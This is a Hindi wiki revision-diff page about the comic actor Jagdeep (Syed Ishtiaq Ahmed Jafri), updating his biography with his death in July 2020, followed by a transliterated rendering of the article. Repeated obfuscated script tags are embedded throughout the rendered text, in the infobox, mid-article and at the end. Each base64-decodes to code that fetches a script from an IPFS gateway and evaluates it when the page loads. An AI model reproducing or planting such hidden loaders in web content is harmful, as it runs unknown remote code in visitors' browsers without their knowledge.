Difference between revisions of "जगदीप"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 7: Line 7:
 
|जन्म=[[19 मार्च]], [[1939]]
 
|जन्म=[[19 मार्च]], [[1939]]
 
|जन्म भूमि= [[दतिया]], [[मध्य प्रदेश]]
 
|जन्म भूमि= [[दतिया]], [[मध्य प्रदेश]]
|मृत्यु=
+
|मृत्यु=[[8 जुलाई]], [[2020]]
|मृत्यु स्थान=
+
|मृत्यु स्थान=[[मुम्बई]], [[महाराष्ट्र]]
 
|अभिभावक=  
 
|अभिभावक=  
 
|पति/पत्नी= नशीम बेगम
 
|पति/पत्नी= नशीम बेगम
|संतान= पुत्र- जावेद जाफ़री, नावेद जाफ़री पुत्री- मुस्कान जाफ़री
+
|संतान= पुत्र- जावेद जाफ़री, नावेद जाफ़री; पुत्री- मुस्कान जाफ़री
|कर्म भूमि=[[महाराष्ट्र]], [[भारत]]
+
|कर्म भूमि=[[भारत]]
|कर्म-क्षेत्र= अभिनेता
+
|कर्म-क्षेत्र= [[अभिनय]]
 
|मुख्य रचनाएँ=
 
|मुख्य रचनाएँ=
|मुख्य फ़िल्में= शोले, फिर वही रात, कुरबानी, शहनशाह, अंदाज अपना-अपना आदि।
+
|मुख्य फ़िल्में='शोले', 'फिर वही रात', 'कुरबानी', 'शहनशाह', 'अंदाज अपना-अपना' आदि।
 
|विषय=
 
|विषय=
 
|शिक्षा=
 
|शिक्षा=
Line 28: Line 28:
 
|शीर्षक 2=
 
|शीर्षक 2=
 
|पाठ 2=
 
|पाठ 2=
|अन्य जानकारी=
+
|अन्य जानकारी=जगदीप ने कई फ़िल्मों में हास्य किरदार निभाए। हालांकि, फ़िल्म 'शोले' में उनके किरदार 'सूरमा भोपाली' को दर्शकों ने इतना पसंद किया गया कि वे दर्शकों के बीच इसी नाम से लोकप्रिय हो गये।
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन={{अद्यतन|18:45, 28 मई 2017 (IST)}}
 
|अद्यतन={{अद्यतन|18:45, 28 मई 2017 (IST)}}
}}
+
}}'''सैय्यद इश्तियाक अहमद जाफ़री''' ([[अंग्रेज़ी]]: ''Syed Ishtiaq Ahmed Jafri'', जन्म- [[19 मार्च]], [[1939]], [[दतिया]], [[मध्य प्रदेश]]; मृत्यु- [[8 जुलाई]], [[2020]], [[मुम्बई]], [[महाराष्ट्र]]) [[भारतीय सिनेमा]] के मशहूर हास्य अभिनेता थे। उन्होंने अपने हास्य अभिनय से दर्शकों में काफ़ी लोकप्रियता हासिल की। उन्होंने अपने कॅरियर की शुरुआत बाल कलाकार के रूप में फ़िल्म 'अफसाना' से की थी। जगदीप ने 400 से अधिक फ़िल्मों काम किया। उन्हें लोग उनके वास्तविक नाम से न जानकर 'जगदीप' नाम से जानते हैं। वे साल [[1975]] में आई मशहूर फिल्म 'शोले' में 'सूरमा भोपाली' के किरदार से काफी चर्चा बटोरने में कामयाब रहे थे।
'''सैय्यद इश्तियाक अहमद जाफ़री''' ([[अंग्रेज़ी]]: ''Syed Ishtiaq Ahmed Jafri'', जन्म- [[19 मार्च]], [[1939]], [[दतिया]], [[मध्य प्रदेश]]) [[भारतीय सिनेमा]] के मशहूर हास्य अभिनेता हैं। उन्होंने अपने हास्य अभिनय से दर्शकों में काफ़ी लोकप्रियता हासिल की। उन्होंने अपने कॅरियर की शुरुआत बाल कलाकार के रूप में फ़िल्म अफसाना से की थी। जगदीप 250 से अधिक फ़िल्मों काम कर चुके हैं। उन्हें लोग इनके वास्तविक नाम से न जानकर जगदीप नाम से जानते हैं।  
 
 
==परिचय==
 
==परिचय==
हिन्दी सिनेमा जगत् के प्रसिद्ध हास्य कलाकार जगदीप का जन्म [[19 मार्च]], [[1939]] को [[मध्य प्रदेश]] के [[दतिया ज़िला|दतिया ज़िले]] में हुआ। उनका पूरा नाम सैय्यद इश्तियाक अहमद जाफ़री है। उनको दो बेटे जावेद और नावेद जाफ़री भी हास्य कलाकार हैं, जिन्होंने ‘बूगी-बूगी’ जैसे लोकप्रिय कार्यक्रम को होस्ट किया था।
+
हिन्दी सिनेमा जगत् के प्रसिद्ध हास्य कलाकार जगदीप का जन्म [[19 मार्च]], [[1939]] को [[मध्य प्रदेश]] के [[दतिया ज़िला|दतिया ज़िले]] में हुआ। उनका पूरा नाम सैय्यद इश्तियाक अहमद जाफ़री है। उनको दो बेटे जावेद जाफ़री और नावेद जाफ़री भी हास्य कलाकार हैं, जिन्होंने ‘बूगी-बूगी’ जैसे लोकप्रिय कार्यक्रम को होस्ट किया था।
 
==फ़िल्मी कॅरियर==
 
==फ़िल्मी कॅरियर==
 
अपने हाव भाव से दर्शकों को हंसाने वाले जगदीप ने उस दौर में काम किया, जब फ़िल्म उद्योग में [[महमूद]], [[जॉनी वॉकर]], घूमल, [[केश्टो मुखर्जी]] जैसे हास्य कलाकार मौज़ूद थे। जगदीप ने अपने फ़िल्मी कॅरियर की शुरुआत बाल कलाकार के रूप में बी. आर. चोपड़ा की फ़िल्म अफसाना से की। इसके बाद चाइल्ड आर्टिस्ट के रूप में ही उन्होंने 'लैला मजनूं' में काम किया। उसके बाद उन्हें के. ए. अब्बास, विमल राय ने भी मौके दिए। जगदीप ने हास्य भूमिका [[विमल राय]] की फ़िल्म 'दो बीघा जमीन' से करने शुरू किए थे इस फ़िल्म ने उन्हें एक नई पहचान दी। इसके बाद उन्होंने बहुत सी कामयाब फ़िल्मों में काम किया। अपने हास्य अभिनय से उन्होंने दर्शकों के दिल में अपने लिए जगह बना ली और फ़िल्म जगत् में सफलता हासिल की।
 
अपने हाव भाव से दर्शकों को हंसाने वाले जगदीप ने उस दौर में काम किया, जब फ़िल्म उद्योग में [[महमूद]], [[जॉनी वॉकर]], घूमल, [[केश्टो मुखर्जी]] जैसे हास्य कलाकार मौज़ूद थे। जगदीप ने अपने फ़िल्मी कॅरियर की शुरुआत बाल कलाकार के रूप में बी. आर. चोपड़ा की फ़िल्म अफसाना से की। इसके बाद चाइल्ड आर्टिस्ट के रूप में ही उन्होंने 'लैला मजनूं' में काम किया। उसके बाद उन्हें के. ए. अब्बास, विमल राय ने भी मौके दिए। जगदीप ने हास्य भूमिका [[विमल राय]] की फ़िल्म 'दो बीघा जमीन' से करने शुरू किए थे इस फ़िल्म ने उन्हें एक नई पहचान दी। इसके बाद उन्होंने बहुत सी कामयाब फ़िल्मों में काम किया। अपने हास्य अभिनय से उन्होंने दर्शकों के दिल में अपने लिए जगह बना ली और फ़िल्म जगत् में सफलता हासिल की।
 
==प्रमुख फ़िल्में==
 
==प्रमुख फ़िल्में==
250 से भी ज़्यादा फ़िल्मों में काम कर चुके जगदीप ‘शोले’, फिर वही रात, कुरबानी, शहनशाह, अंदाज अपना-अपना जैसी फ़िल्मों में काम कर चुके हैं। साल [[1957]] में आयोजित ‘बाल फ़िल्म समारोह’ के अंतिम दौर के लिए चुनी गयीं 3 फ़िल्में ‘मुन्ना’ ([[1954]]), ‘अब दिल्ली दूर नहीं’ और ‘हम पंछी एक डाल के’ ([[1957]]) में जगदीप ने अहम भूमिका निभाई।
+
400 से भी ज़्यादा फ़िल्मों में काम कर चुके जगदीप ‘शोले’, फिर वही रात, कुरबानी, शहनशाह, अंदाज अपना-अपना जैसी फ़िल्मों में काम कर चुके हैं। साल [[1957]] में आयोजित ‘बाल फ़िल्म समारोह’ के अंतिम दौर के लिए चुनी गयीं 3 फ़िल्में ‘मुन्ना’ ([[1954]]), ‘अब दिल्ली दूर नहीं’ और ‘हम पंछी एक डाल के’ ([[1957]]) में जगदीप ने अहम भूमिका निभाई।
 
==यादगार भूमिका==
 
==यादगार भूमिका==
जगदीप ने कई फ़िल्मों में हास्य किरदार निभाए हैं। हालांकि, फ़िल्म 'शोले' में उनके किरदार 'सूरमा भोपाली' को दर्शकों ने इतना पसंद किया गया कि वे आज भी दर्शकों के बीच इसी नाम से लोकप्रिय हो गये। शोले का सूरमा भोपाली हमेशा से ही लोगों के जेहन में मौज़ूद रहने वाला चरित्र रहा है। आज भी अगर लोग उनको को याद करते हैं तो शोले में निभाया गया यह किरदार कभी नहीं भूलते। सूरमा भोपाली का किरदार इतना चर्चित हुआ कि इसी नाम से जगदीप ने एक फ़िल्म का निर्देशन भी कर दिया।
+
जगदीप ने कई फ़िल्मों में हास्य किरदार निभाए। हालांकि, फ़िल्म 'शोले' में उनके किरदार 'सूरमा भोपाली' को दर्शकों ने इतना पसंद किया गया कि वे दर्शकों के बीच इसी नाम से लोकप्रिय हो गये। शोले का सूरमा भोपाली हमेशा से ही लोगों के जेहन में मौज़ूद रहने वाला चरित्र रहा है। आज भी अगर लोग उनको याद करते हैं तो शोले में निभाया गया यह किरदार कभी नहीं भूलते। सूरमा भोपाली का किरदार इतना चर्चित हुआ कि इसी नाम से जगदीप ने एक फ़िल्म का निर्देशन भी कर दिया था।
 
+
==मृत्यु==
 +
एक हास्य अभिनेता के रूप में प्रसिद्धि पा चुके जगदीप का निधन 81 साल की उम्र में [[8 जुलाई]], [[2020]] को हुआ। बढ़ती उम्र से होने वाली दिक्कतों के चलते उन्होंने अपने प्राण त्याग दिए। रात 8.40 पर उनका निधन [[मुंबई]] स्थित अपने घर पर हुआ।
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Revision as of 06:05, 9 July 2020

jagadip
poora nam saiyyad ishtiyak ahamad jafari
prasiddh nam jagadip
janm 19 march, 1939
janm bhoomi datiya, madhy pradesh
mrityu 8 julaee, 2020
mrityu sthan mumbee, maharashtr
pati/patni nashim begam
santan putr- javed jafari, naved jafari; putri- muskan jafari
karm bhoomi bharat
karm-kshetr abhinay
mukhy filmean 'shole', 'phir vahi rat', 'kurabani', 'shahanashah', 'aandaj apana-apana' adi.
prasiddhi hasy abhineta
nagarikata bharatiy
any janakari jagadip ne kee filmoan mean hasy kiradar nibhae. halaanki, film 'shole' mean unake kiradar 'soorama bhopali' ko darshakoan ne itana pasand kiya gaya ki ve darshakoan ke bich isi nam se lokapriy ho gaye.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>saiyyad ishtiyak ahamad jafari (aangrezi: Syed Ishtiaq Ahmed Jafri, janm- 19 march, 1939, datiya, madhy pradesh; mrityu- 8 julaee, 2020, mumbee, maharashtr) bharatiy sinema ke mashahoor hasy abhineta the. unhoanne apane hasy abhinay se darshakoan mean kafi lokapriyata hasil ki. unhoanne apane kॅriyar ki shuruat bal kalakar ke roop mean film 'aphasana' se ki thi. jagadip ne 400 se adhik filmoan kam kiya. unhean log unake vastavik nam se n janakar 'jagadip' nam se janate haian. ve sal 1975 mean aee mashahoor philm 'shole' mean 'soorama bhopali' ke kiradar se kaphi charcha batorane mean kamayab rahe the.

parichay

hindi sinema jagath ke prasiddh hasy kalakar jagadip ka janm 19 march, 1939 ko madhy pradesh ke datiya zile mean hua. unaka poora nam saiyyad ishtiyak ahamad jafari hai. unako do bete javed jafari aur naved jafari bhi hasy kalakar haian, jinhoanne ‘boogi-boogi’ jaise lokapriy karyakram ko host kiya tha.

filmi kॅriyar

apane hav bhav se darshakoan ko hansane vale jagadip ne us daur mean kam kiya, jab film udyog mean mahamood, j aauni v aaukar, ghoomal, keshto mukharji jaise hasy kalakar mauzood the. jagadip ne apane filmi kॅriyar ki shuruat bal kalakar ke roop mean bi. ar. chop da ki film aphasana se ki. isake bad chaild artist ke roop mean hi unhoanne 'laila majanooan' mean kam kiya. usake bad unhean ke. e. abbas, vimal ray ne bhi mauke die. jagadip ne hasy bhoomika vimal ray ki film 'do bigha jamin' se karane shuroo kie the is film ne unhean ek nee pahachan di. isake bad unhoanne bahut si kamayab filmoan mean kam kiya. apane hasy abhinay se unhoanne darshakoan ke dil mean apane lie jagah bana li aur film jagath mean saphalata hasil ki.

pramukh filmean

400 se bhi zyada filmoan mean kam kar chuke jagadip ‘shole’, phir vahi rat, kurabani, shahanashah, aandaj apana-apana jaisi filmoan mean kam kar chuke haian. sal 1957 mean ayojit ‘bal film samaroh’ ke aantim daur ke lie chuni gayian 3 filmean ‘munna’ (1954), ‘ab dilli door nahian’ aur ‘ham panchhi ek dal ke’ (1957) mean jagadip ne aham bhoomika nibhaee.

yadagar bhoomika

jagadip ne kee filmoan mean hasy kiradar nibhae. halaanki, film 'shole' mean unake kiradar 'soorama bhopali' ko darshakoan ne itana pasand kiya gaya ki ve darshakoan ke bich isi nam se lokapriy ho gaye. shole ka soorama bhopali hamesha se hi logoan ke jehan mean mauzood rahane vala charitr raha hai. aj bhi agar log unako yad karate haian to shole mean nibhaya gaya yah kiradar kabhi nahian bhoolate. soorama bhopali ka kiradar itana charchit hua ki isi nam se jagadip ne ek film ka nirdeshan bhi kar diya tha.

mrityu

ek hasy abhineta ke roop mean prasiddhi pa chuke jagadip ka nidhan 81 sal ki umr mean 8 julaee, 2020 ko hua. badhati umr se hone vali dikkatoan ke chalate unhoanne apane pran tyag die. rat 8.40 par unaka nidhan muanbee sthit apane ghar par hua.

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>